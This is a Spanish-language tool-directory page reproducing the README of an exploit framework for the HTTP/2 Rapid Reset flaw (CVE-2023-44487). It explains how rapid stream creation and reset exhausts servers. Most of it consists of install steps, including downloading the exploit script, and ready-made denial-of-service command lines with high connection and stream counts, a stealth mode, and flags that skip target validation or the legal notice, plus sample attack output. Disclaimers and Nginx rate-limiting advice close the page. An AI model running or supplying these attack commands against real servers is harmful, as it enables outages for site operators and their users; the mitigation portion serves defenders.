Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2023-44487-HTTP2-DoS-Rapid-Reset-Exploit — Advanced CVE-2023-44487 HTTP/2 Rapid Reset vulnerability exploitation framework. Features multi-connection concurrent attacks, adaptive rate control, stealth mode with randomized headers, real-time metrics, and risk assessment reporting. For authorized penetration testing only. By Sudeepa Wanigarathna | Kitploit
Herramientas/GitHubGitHub/cerberusmrxi/cve-2023-44487-http2-dos-rapid-reset-exploit
Exploit FrameworksVulnerability AnalysisExploitationWeb SecurityPenetration TestingRed TeamingAdversarial Attack
GitHubcerberusmrxi/cve-2023-44487-http2-dos-rapid-reset-exploit

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →

CVE-2023-44487-HTTP2-DoS-Rapid-Reset-Exploit

Ver Repositorio
1hace 19 díasAún no revisado

Acerca de

Advanced CVE-2023-44487 HTTP/2 Rapid Reset vulnerability exploitation framework. Features multi-connection concurrent attacks, adaptive rate control, stealth mode with randomized headers, real-time metrics, and risk assessment reporting. For authorized penetration testing only. By Sudeepa Wanigarathna

Compartir

Exploit de DoS HTTP/2 de Restablecimiento Rápido CVE-2023-44487

Edición Profesional v1.0.1 | Autor: Sudeepa Wanigarathna

Python Version License Version CVSS


Tabla de contenidos

  • Descripción general
  • Detalles de la vulnerabilidad
  • Características
  • Requisitos
  • Instalación
  • Inicio rápido
  • Guía de uso
  • Opciones de configuración
  • Soporte de Docker
  • Ejemplos
  • Interpretación de los resultados
  • Recomendaciones de seguridad
  • Aviso legal
  • Autor
  • Registro de cambios

Descripción general

Un marco de evaluación de nivel profesional para CVE-2023-44487, la vulnerabilidad de Restablecimiento Rápido de HTTP/2. Esta herramienta ayuda a los profesionales de la seguridad a probar y validar sistemas frente a una de las condiciones de DoS de HTTP/2 más impactantes divulgadas en los últimos años.

Demuestra cómo la creación y el restablecimiento rápidos de flujos HTTP/2 pueden agotar los recursos del servidor y provocar condiciones de Denegación de Servicio (DoS).

Características principales de un vistazo

  • Motor de ataque multiconexión — Conexiones HTTP/2 concurrentes
  • Control de tasa adaptativo — Ajuste dinámico para la máxima eficacia
  • Modo sigiloso — Cabeceras aleatorias y rotación de conexiones
  • Informes completos — JSON/CSV con evaluación de riesgos
  • Soporte de Docker — Despliegue en contenedores
  • Monitorización en tiempo real — Métricas del ataque y progreso en vivo
  • Registro profesional — Salida de consola con colores y registro en archivo
UsoResultados

Detalles de la vulnerabilidad

CVE-2023-44487: Ataque de Restablecimiento Rápido de HTTP/2

Descripción técnica

La vulnerabilidad explota el mecanismo de gestión de flujos del protocolo HTTP/2:

  1. Creación de flujo — El cliente envía una trama HEADERS para crear un nuevo flujo
  2. Restablecimiento inmediato — El cliente envía inmediatamente una trama RST_STREAM
  3. Procesamiento del servidor — El servidor debe procesar ambas tramas, lo que consume recursos
  4. Agotamiento de recursos — Los ciclos repetidos desbordan los recursos del servidor

Impacto

  • Agotamiento de recursos en servidores HTTP/2
  • Posible Denegación de Servicio (DoS)
  • Puede afectar a balanceadores de carga, proxies y CDN
  • No requiere autenticación ni privilegios especiales

Características

Características principales

Capacidades avanzadas

  • Soporte de proxy — Configuración de proxy extensible
  • Agrupación de conexiones — Gestión eficiente de conexiones
  • Recuperación de errores — Manejo elegante de los fallos de conexión
  • Ajuste de rendimiento — Parámetros configurables para diferentes escenarios
  • Integración CI/CD — Adecuado para pruebas de seguridad automatizadas

Requisitos

Requisitos del sistema

Dependencias

root@kitploit:~
h2>=4.1.0,<5.0.0
aiohttp>=3.8.0,<4.0.0

Instalación

1. Instalación rápida

root@kitploit:~
# Clone the repository
git clone https://github.com/CerberusMrXi/CVE-2023-44487-HTTP2-DoS-Rapid-Reset-Exploit
cd CVE-2023-44487-HTTP2-DoS-Rapid-Reset-Exploit

# Install dependencies
pip install -r requirements.txt

# Verify installation
python3 cve-2023-44487-exploit.py --help

2. Entorno virtual (Recomendado)

root@kitploit:~
# Create virtual environment
python3 -m venv venv

# Activate virtual environment
# On Linux/macOS:
source venv/bin/activate
# On Windows:
venv\Scripts\activate

# Install dependencies
pip install -r requirements.txt

3. Instalación con Docker

root@kitploit:~
# Build Docker image
docker build -t cve-2023-44487-exploit .

# Run with Docker
docker run --rm cve-2023-44487-exploit target.com

4. Instalación manual

root@kitploit:~
# Install without requirements.txt
pip install "h2>=4.1.0,<5.0.0" "aiohttp>=3.8.0,<4.0.0"

# Download the exploit
wget https://raw.githubusercontent.com/CerberusMrXi/CVE-2023-44487-HTTP2-DoS-Rapid-Reset-Exploit/main/cve-2023-44487-exploit.py

# Make executable
chmod +x cve-2023-44487-exploit.py

Inicio rápido

Uso básico

root@kitploit:~
# Simple run with default settings
python3 cve-2023-44487-exploit.py example.com

# Test HTTPS on port 443
python3 cve-2023-44487-exploit.py target.com -p 443 --no-verify

# Test HTTP on port 80
python3 cve-2023-44487-exploit.py target.com -p 80 --no-ssl

Prueba rápida (5 segundos)

root@kitploit:~
python3 cve-2023-44487-exploit.py target.com -c 10 -s 100 -d 5 --no-verify

Evaluación completa (60 segundos)

root@kitploit:~
python3 cve-2023-44487-exploit.py target.com -c 100 -s 2000 -d 60 --stealth --no-verify

Guía de uso

Opciones de línea de comandos

Configuración del objetivo

Configuración del ataque

Opciones avanzadas

Informes


Opciones de configuración

Utilice los indicadores de CLI anteriores para ajustar la concurrencia, el volumen de flujos, la duración y los informes. Prefiera valores más bajos de -c / -s / -d para la validación inicial y escale solo en sistemas que esté autorizado a someter a pruebas de estrés.


Soporte de Docker

Construir imagen

root@kitploit:~
docker build -t cve-2023-44487-exploit .

Ejecutar evaluación básica

root@kitploit:~
docker run --rm cve-2023-44487-exploit target.com

Ejecutar con parámetros personalizados

root@kitploit:~
docker run --rm cve-2023-44487-exploit target.com -c 100 -s 2000 -d 60

Guardar resultados localmente

root@kitploit:~
docker run --rm -v "$(pwd)/results:/app/results" \
  cve-2023-44487-exploit target.com -o /app/results/report.json

Modo interactivo

root@kitploit:~
docker run --rm -it --entrypoint /bin/bash cve-2023-44487-exploit

Docker Compose

root@kitploit:~
# Start with docker-compose
docker-compose up

# Run with a custom command
docker-compose run --rm exploit target.com -c 100 -s 2000 -d 60

Ejemplos

1. Evaluación HTTPS básica

root@kitploit:~
python3 cve-2023-44487-exploit.py api.example.com -p 443 --no-verify -c 50 -s 1000 -d 30

2. Evaluación HTTP (sin SSL)

root@kitploit:~
python3 cve-2023-44487-exploit.py api.example.com -p 80 --no-ssl -c 50 -s 1000 -d 30

3. Ejecución de laboratorio de alto rendimiento

root@kitploit:~
python3 cve-2023-44487-exploit.py target.com -c 200 -s 5000 -d 120 --target-rps 50000

4. Modo sigiloso

root@kitploit:~
python3 cve-2023-44487-exploit.py target.com --stealth -c 100 -s 2000 -d 60

5. Prueba de validación rápida

root@kitploit:~
python3 cve-2023-44487-exploit.py target.com -c 10 -s 100 -d 5 --no-verify

6. Generar informe CSV

root@kitploit:~
python3 cve-2023-44487-exploit.py target.com --format csv -o report.csv

7. Omitir validación

root@kitploit:~
python3 cve-2023-44487-exploit.py target.com --skip-validation -c 50 -s 1000 -d 30

8. Prueba de producción autorizada

root@kitploit:~
python3 cve-2023-44487-exploit.py production.com -p 443 --no-verify \
  -c 100 -s 2000 -d 60 --stealth -o full_report.json

Interpretación de los resultados

Métricas de salida

Niveles de evaluación de riesgos

Ejemplo de salida

root@kitploit:~
================================================================================
EXPLOIT EXECUTION SUMMARY
================================================================================
Target: target.com:443
Duration: 30.00s
Total Streams: 15,234
Successful Resets: 15,198
Reset Rate: 506.6/s
Success Rate: 99.76%
Connection Errors: 0
--------------------------------------------------------------------------------
RISK ASSESSMENT
--------------------------------------------------------------------------------
Risk Level: CRITICAL
Risk Score: 95/100
Factors:
  - Extremely high reset rate accepted
  - Very high success rate
================================================================================

Recomendaciones de seguridad

Para administradores de sistemas

Acciones inmediatas

  1. Aplicar parches de seguridad

    • Actualice a las últimas implementaciones de HTTP/2
    • Aplique los parches de seguridad específicos del proveedor
    • Actualice los balanceadores de carga y los proxies
  2. Implementar limitación de tasa

    root@kitploit:~
    # Nginx rate limiting example
    http {
        limit_req_zone $binary_remote_addr zone=http2:10m rate=10r/s;
        limit_req zone=http2 burst=20 nodelay;
    }
    
  3. Límites de conexión

    root@kitploit:~
    # Limit connections per client
    limit_conn_zone $binary_remote_addr zone=conn_zone:10m;
    limit_conn conn_zone 10;
    

Endurecimiento de la configuración

ParámetroRecomendación
Flujos concurrentes máximos

Monitorización

root@kitploit:~
# Monitor HTTP/2 connections
netstat -an | grep 443 | grep ESTABLISHED | wc -l

# Monitor reset-related log entries (example)
grep "RST_STREAM" /var/log/nginx/error.log | wc -l

Controles de seguridad recomendados

  • Limitación de tasa — Implementar límites de flujos por cliente
  • Limitación de conexiones — Limitar conexiones por IP
  • Límites de recursos — Establecer valores de tiempo de espera de conexión
  • Monitorización — Habilitar el registro y alertas para anomalías
  • Reglas WAF — Implementar reglas WAF específicas para HTTP/2
  • Gestión de parches — Actualizaciones de seguridad periódicas
  • Respuesta a incidentes — Tener un plan para ataques DoS

Aviso legal

IMPORTANTE: LEA ESTO ATENTAMENTE ANTES DE UTILIZAR ESTA HERRAMIENTA

Esta herramienta se proporciona únicamente para pruebas de seguridad autorizadas y fines educativos.

Términos de uso

Al utilizar esta herramienta, usted reconoce y acepta que:

  1. Usted tiene permiso explícito por escrito para probar el sistema objetivo
  2. Usted comprende los riesgos y el impacto potencial de esta evaluación
  3. Usted cumplirá con todas las leyes y normativas aplicables
  4. Usted acepta la plena responsabilidad por sus acciones
  5. Usted no utilizará esta herramienta para actividades no autorizadas

Usos prohibidos

Esta herramienta NO debe utilizarse para:

  • Pruebas o ataques no autorizados
  • Denegación de servicio contra sistemas que no posea o para los que no tenga permiso de probar
  • Interrumpir sistemas de producción sin autorización
  • Causar daños económicos
  • Cualquier actividad ilegal

Declaración de responsabilidad

EL AUTOR Y LOS COLABORADORES PROPORCIONAN ESTA HERRAMIENTA "TAL CUAL", SIN NINGUNA GARANTÍA. EL USO DE ESTA HERRAMIENTA ES BAJO SU PROPIO RIESGO. EL AUTOR NO ES RESPONSABLE DE NINGÚN DAÑO NI PROBLEMA LEGAL DERIVADO DEL USO DE ESTA HERRAMIENTA.

El uso no autorizado de esta herramienta puede infringir leyes, incluidas, entre otras:

  • Computer Fraud and Abuse Act (CFAA) — EE. UU.
  • Computer Misuse Act — Reino Unido
  • Reglamento General de Protección de Datos (GDPR) — UE
  • Otras leyes locales, nacionales e internacionales aplicables

Autor

Sudeepa Wanigarathna

  • Investigador de seguridad y probador de penetración
  • Especializado en seguridad de aplicaciones y vulnerabilidades de protocolo
  • GitHub
  • LinkedIn

Registro de cambios

Versión 1.0.1 (Actual)

  • Corregido el error de atributo connection_attempts
  • Mejorada la validación SSL/ALPN
  • Añadida la gestión de tiempos de espera
  • Mejorada la recuperación de errores
  • Añadido el indicador --skip-validation
  • Mejorado el soporte de Docker

Versión 1.0.0 (Inicial)

  • Lanzamiento inicial de la edición profesional
  • Motor de ataque multiconexión
  • Control de tasa adaptativo
  • Modo sigiloso
  • Informes completos
  • Soporte de Docker

Licencia

Este proyecto está bajo la Licencia MIT; consulte el archivo LICENSE para obtener más detalles.


Agradecimientos

  • Equipo del protocolo HTTP/2
  • Investigadores de seguridad que identificaron CVE-2023-44487
  • Comunidad de código abierto (proyectos h2, aiohttp)

Referencias

  • Entrada de CVE-2023-44487 en NVD
  • Análisis del ataque de Restablecimiento Rápido de HTTP/2
  • Especificación del protocolo HTTP/2 (RFC 9113)
  • Aviso de seguridad de Nginx para HTTP/2
  • Guía de seguridad de Apache para HTTP/2

Soporte

Para incidencias y preguntas:

  • Incidencias de GitHub: Enviar una incidencia
  • Email: [email protected]
  • Contacto de seguridad: si encuentra una vulnerabilidad en este proyecto, infórmela de manera responsable.

Tarjeta de referencia rápida

root@kitploit:~
# Quick Commands

# Test HTTPS (skip cert verify)
python3 cve-2023-44487-exploit.py target.com --no-verify

# Test HTTP
python3 cve-2023-44487-exploit.py target.com -p 80 --no-ssl

# Quick test (5 seconds)
python3 cve-2023-44487-exploit.py target.com -c 10 -s 100 -d 5

# Full assessment
python3 cve-2023-44487-exploit.py target.com -c 100 -s 2000 -d 60 --stealth

# Skip validation
python3 cve-2023-44487-exploit.py target.com --skip-validation

# Docker
docker run --rm cve-2023-44487-exploit target.com

# Help
python3 cve-2023-44487-exploit.py --help

RECORDATORIO: obtenga siempre la autorización adecuada antes de probar cualquier sistema. Utilice esta herramienta de manera responsable y ética.


Mantenido por Sudeepa Wanigarathna | Última actualización: agosto de 2026

Descargar herramienta
AtributoValor
ID de CVECVE-2023-44487
Puntuación CVSS7.5 (Alta)
Vector de ataqueRed
Complejidad del ataqueBaja
ImpactoDenegación de Servicio (Agotamiento de recursos)
Protocolos afectadosHTTP/2
Fecha de divulgaciónOctubre de 2023
CaracterísticaDescripción
Soporte de HTTP/2Implementación completa del protocolo HTTP/2 mediante la librería h2
MulticonexiónAtaque concurrente a través de múltiples conexiones
SSL/TLSSoporte HTTPS con opciones de verificación de certificados
Control de tasa adaptativoAjusta dinámicamente la tasa de ataque según la respuesta del servidor
Modo sigilosoCabeceras aleatorias y rotación de conexiones
Monitorización en tiempo realVisualización de métricas en vivo durante la ejecución
Informes completosSalida JSON/CSV con evaluación de riesgos
Soporte de DockerDespliegue en contenedores para facilitar las pruebas
ComponenteMínimoRecomendado
SOLinux / macOS / WindowsLinux o macOS
Python3.7+3.11+
CPU2 núcleos4+ núcleos
RAM2GB4GB+
Red100Mbps1Gbps+
OpciónDescripciónValor predeterminado
hostNombre de host o IP del objetivoObligatorio
-p, --portPuerto del objetivo443
--no-sslDeshabilitar SSL/TLSFalse
--no-verifyOmitir la verificación SSLFalse
OpciónDescripciónValor predeterminado
-c, --connectionsNúmero de conexiones concurrentes50
-s, --streamsFlujos por conexión1000
-d, --durationDuración en segundos30
--max-streamsMáximo de flujos totales100000
--delayRetardo base entre operaciones0.0001s
OpciónDescripciónValor predeterminado
--adaptiveControl de tasa adaptativoTrue
--target-rpsSolicitudes objetivo por segundo10000
--stealthModo sigiloso (cabeceras aleatorias)False
--skip-validationOmitir la validación del objetivoFalse
--forceOmitir el aviso legalFalse
OpciónDescripciónValor predeterminado
-o, --outputNombre del archivo de salidaexploit_results.json
--formatFormato de salida (json / csv / console)json
-v, --verboseRegistro detallado (verbose)False
EscenarioIndicadores sugeridos
Prueba de humo-c 10 -s 100 -d 5
Evaluación estándar-c 50 -s 1000 -d 30
Prueba de laboratorio de alta carga-c 100 -s 2000 -d 60 --stealth
Certificado no confiable--no-verify
HTTP simple-p 80 --no-ssl
MétricaDescripciónInterpretación
Flujos totalesNúmero de flujos creadosMayor número = más carga generada
Restablecimientos exitososFlujos restablecidos correctamenteNormalmente más del 90 % en objetivos vulnerables
Tasa de restablecimiento (RPS)Restablecimientos por segundoMayor tasa = carga más eficaz
Tasa de éxitoPorcentaje de restablecimientos exitososMás del 90 % suele indicar exposición
Errores de conexiónConexiones fallidasBajo = conectividad estable
Restablecimientos del servidorRestablecimientos iniciados por el servidorAlto = hay medidas de protección presentes
NivelPuntuaciónSignificado
CRÍTICO80–100Servidor altamente vulnerable
ALTO60–79Servidor vulnerable, con cierta protección
MEDIO40–59Hay cierta protección implementada
BAJO0–39Servidor bien protegido
Establecer entre 100 y 200 por conexión
Tasa de restablecimiento de flujosLimitar a <100/seg por cliente
Límite de conexionesMáximo de 50 a 100 conexiones por IP
Valores de tiempo de esperaReducir los tiempos de espera de inactividad
Límites de tamaño de solicitudesLimitar el tamaño de las cabeceras y la carga útil